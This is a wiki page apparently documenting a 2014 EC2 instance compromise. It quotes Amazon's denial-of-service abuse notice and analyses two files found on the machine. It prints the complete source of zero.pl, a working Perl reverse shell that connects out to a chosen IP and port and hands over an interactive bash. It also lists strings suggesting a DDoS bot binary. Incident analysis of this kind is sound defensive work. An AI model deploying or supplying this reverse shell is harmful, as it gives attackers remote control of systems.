Virus/zero.pl

From Omnia
Jump to navigation Jump to search 
From: Amazon EC2 Abuse
Subject: Your Amazon EC2 Abuse Report [16614771493-2]
Date: July 7, 2014 at 6:41:49 AM MST
Reply-To: Amazon EC2 Abuse <ec2-abuse@amazon.com>

Dear Amazon EC2 Customer,

We've received a report that your instance(s):

Instance Id: i-XXXXXXXX

has been making Denial of Service attacks against remote hosts on the Internet.

Check the information provided below by the abuse reporter.

This is specifically forbidden in our User Agreement: http://aws.amazon.com/agreement/

Please immediately restrict the flow of traffic from your instances(s) to cease
disruption to other networks and reply this email to send your reply of action
to the original abuse reporter. This will activate a flag in our ticketing
system, letting us know that you have acknowledged receipt of this email.

It's possible that your environment has been compromised by an external attacker.
It remains your responsibility to ensure that your instances and all applications
are secured. The link http://developer.amazonwebservices.com/connect/entry.jspa?externalID=1233
provides some suggestions for securing your instances.

It has come to our attention that Denial of Service (DoS) attacks were launched from your instance
to IP XXX.XXX.XXX.XXX via UDP port(s) 80. Please investigate your instance(s) and reply detailing
the corrective measures you will be taking to address this activity.

Case number: 16614771493-1

Additional abuse report information provided by original abuse reporter:
* Destination IPs:
* Destination Ports:
* Destination URLs:
* Abuse Time: Mon Jul 07 13:25:43 UTC 2014
* Log Extract:
<<<
It has come to our attention that Denial of Service (DoS) attacks were launched from your instance to
IP 116.31.100.90 via UDP port(s) 80. Please investigate your instance(s) and reply detailing the
corrective measures you will be taking to address this activity.

In the meantime, we have blocked outbound UDP 80 on the instance(s) to prevent further abuse.

If you believe that you were compromised by an external attacker, the best recourse is to back up your
data, migrate your applications to a new instance, and terminate the old one. Attempting to repair a
compromised instance does not guarantee a successful cleanup in most cases. We recommend reviewing the
following resources to ensure your EC2 environment is properly secured:

* Amazon EC2 Security Groups User Guide:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html

* AWS Security Resources:
http://aws.amazon.com/security/security-resources/

* AWS Security Best Practices:
https://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf

Thanks in advance for your attention to this report.


Files found: 

c3fd28831d9fc683000273643b5bef12  zero.pl
4206e8b780cf3758baa76b1002e61792  .Linux_time_y_2015

Guessing they somehow came through a security exploit in ElasticSearch.

zero.pl: (also found here: [1]) 

#!/usr/bin/perl -w

use strict;
use Socket;
use IO::Handle;

if($#ARGV+1 != 2){
print "$#ARGV $0 Remote_IP Remote_Port \n";
exit 1;
}

my $remote_ip = $ARGV[0];
my $remote_port = $ARGV[1];

my $proto = getprotobyname("tcp");
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));

my $shell = '/bin/bash -i';

socket(SOCK, AF_INET, SOCK_STREAM, $proto);

STDOUT->autoflush(1);
SOCK->autoflush(1);

connect(SOCK,$pack_addr) or die "can not connect:$!";

open STDIN, "<&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";

print "Enjoy the shell.\n";

system($shell);
close SOCK;

exit 0;

.Linux_time_y_2015: (binary)

  • statically linked executable
  • file: linux: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
  • strings:
  • upx decompressed strings:
    • "std::basic_string" -- implies it was a C++ source file
    • "Keld Simonsen" -- fluke? compiler?
      • "keld@dkuug.dk"
      • "+45 3122-6543"
      • "+45 3325-6543"
      • "1997-12-20"
      • "ISO/IEC JTC1/SC22/WG20 - internationalization"
      • "C/o Keld Simonsen, Skt. Jorgens Alle 8, DK-1615 Kobenhavn V"
    • "GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)" -- compiler
    • Source files mentioned: (possibly related: [2])
      • Fake.cpp
      • Global.cpp
      • main.cpp
      • Manager.cpp
      • ServerIP.cpp
      • StatBase.cpp
      • ThreadAttack.cpp
      • ThreadHostStatus.cpp
      • ThreadTaskManager.cpp
      • ThreadTimer.cpp
      • AutoLock.cpp
      • FileOp.cpp
      • Log.cpp
      • Md5.cpp
      • Media.cpp
      • NetBase.cpp
      • ThreadCondition.cpp
      • Thread.cpp
      • ThreadMutex.cpp
      • Utility.cpp
Retrieved from "https://aznot.com/index.php?title=Virus/zero.pl&oldid=352"